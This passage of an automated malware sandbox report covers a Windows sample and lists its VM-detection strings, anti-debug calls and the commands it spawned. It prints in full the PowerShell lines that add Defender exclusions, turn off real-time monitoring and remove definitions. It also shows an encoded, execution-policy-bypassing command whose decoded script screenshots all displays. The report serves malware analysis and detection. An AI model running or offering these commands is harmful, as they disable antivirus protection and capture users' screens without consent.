Source: rar.exe, 00000053.00000002.2143104282.000001B0DE23A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: El9HaBFrFM.exe, 00000001.00000002.2249585620.0000025068140000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmware
Source: getmac.exe, 0000003B.00000003.1853439233.000001C00657D000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000003B.00000002.1857265321.000001C006591000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000003B.00000003.1853271720.000001C00656A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Win32_NetworkProtocolHyper-V RAWHyper-VRAWHyper-V RAW_FRAGMENTATION
Source: getmac.exe, 0000003B.00000003.1853439233.000001C00657D000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000003B.00000002.1857265321.000001C00657E000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000003B.00000003.1853271720.000001C00656A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ssubkeyname"system\currentcontrolset\services\hyper-v\linkage"E_STR
Source: El9HaBFrFM.exe, 00000001.00000002.2249310602.0000025067E40000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWP
Source: El9HaBFrFM.exe, 00000001.00000003.1703337610.0000025067FF5000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000002.2249585620.0000025068140000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmusrvc
Source: getmac.exe, 0000003B.00000003.1852786093.000001C0065AB000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000003B.00000003.1853271720.000001C00656A000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000003B.00000002.1857265321.000001C0065B3000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000003B.00000003.1853388205.000001C0065B1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: __PARAMETERSSYSTEM\CurrentControlSet\Services\Hyper-V\LinkageExportA
Source: El9HaBFrFM.exe, 00000001.00000003.1703337610.0000025067FF5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmware)
Source: getmac.exe, 0000003B.00000003.1852786093.000001C0065AB000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000003B.00000003.1853271720.000001C00656A000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000003B.00000002.1857265321.000001C0065B3000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000003B.00000003.1853388205.000001C0065B1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage
Source: El9HaBFrFM.exe, 00000001.00000002.2249585620.0000025068140000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmtoolsd
Source: El9HaBFrFM.exe, 00000001.00000003.1703337610.0000025067FF5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmwareservicerc
Source: El9HaBFrFM.exe, 00000001.00000002.2249585620.0000025068140000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmwareservice
Source: El9HaBFrFM.exe, 00000001.00000002.2249585620.0000025068140000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: >f8vmware

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\El9HaBFrFM.exe

Code function: 0_2_00007FF6BA3AD12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00007FF6BA3AD12C

Source: C:\Users\user\Desktop\El9HaBFrFM.exe

Code function: 1_2_00007FFDFA9E0350 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,

1_2_00007FFDFA9E0350

Source: C:\Users\user\Desktop\El9HaBFrFM.exe

Code function: 0_2_00007FF6BA3C3480 GetProcessHeap,

0_2_00007FF6BA3C3480

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 0_2_00007FF6BA3AD30C SetUnhandledExceptionFilter,	0_2_00007FF6BA3AD30C
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 0_2_00007FF6BA3AC8A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00007FF6BA3AC8A0
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 0_2_00007FF6BA3AD12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FF6BA3AD12C
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 0_2_00007FF6BA3BA614 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FF6BA3BA614
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FF6BA3AD30C SetUnhandledExceptionFilter,	1_2_00007FF6BA3AD30C
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FF6BA3AC8A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_00007FF6BA3AC8A0
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FF6BA3AD12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_00007FF6BA3AD12C
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FF6BA3BA614 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_00007FF6BA3BA614
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FFDFA933248 IsProcessorFeaturePresent,00007FFE13341A90,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,00007FFE13341A90,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_00007FFDFA933248
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FFDFAB2DFFC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_00007FFDFAB2DFFC
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FFDFAAB212B IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_00007FFDFAAB212B
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FFDFAAB1CB7 SetUnhandledExceptionFilter,	1_2_00007FFDFAAB1CB7
Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe	Code function: 83_2_00007FF6D7F34C10 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	83_2_00007FF6D7F34C10
Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe	Code function: 83_2_00007FF6D7F2B52C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	83_2_00007FF6D7F2B52C
Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe	Code function: 83_2_00007FF6D7F2A66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	83_2_00007FF6D7F2A66C
Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe	Code function: 83_2_00007FF6D7F2B6D8 SetUnhandledExceptionFilter,	83_2_00007FF6D7F2B6D8

Source: C:\Users\user\AppData\Local\Temp\bound.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\svchost.exe

Domain query: code.jquery.com

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\El9HaBFrFM.exe'"
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\El9HaBFrFM.exe'
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\El9HaBFrFM.exe'"	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'"	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\El9HaBFrFM.exe'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'

Bypasses PowerShell execution policy

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB

Encrypted powershell cmdline option found

Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}

Modifies Windows Defender protection settings

Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
